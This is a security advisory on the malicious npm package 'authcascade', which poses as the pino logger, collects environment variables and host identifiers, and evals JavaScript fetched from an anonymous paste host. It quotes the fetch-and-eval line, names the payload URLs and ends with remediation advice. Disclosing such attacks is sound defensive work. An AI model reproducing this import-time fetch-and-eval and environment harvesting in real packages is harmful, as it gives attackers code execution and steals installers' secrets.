authcascadenpm

On require('authcascade'), the package's main entry pino.js loads lib/writer.js which (a) builds a data object containing the full process.env, OS platform, hostname, username, and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval(): require('axios').get(atob(...)).then(r => { eval(r.data.data); }). A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module. jsonkeeper.com is an anonymous, mutable JSON paste host — the maintainer can swap in arbitrary JavaScript at any moment, which then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.), giving attacker-controlled remote code execution and credential theft on every installer that loads the package. The package additionally impersonates the legitimate pino logger: package.json sets main: pino.js, homepage: https://getpino.io, and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.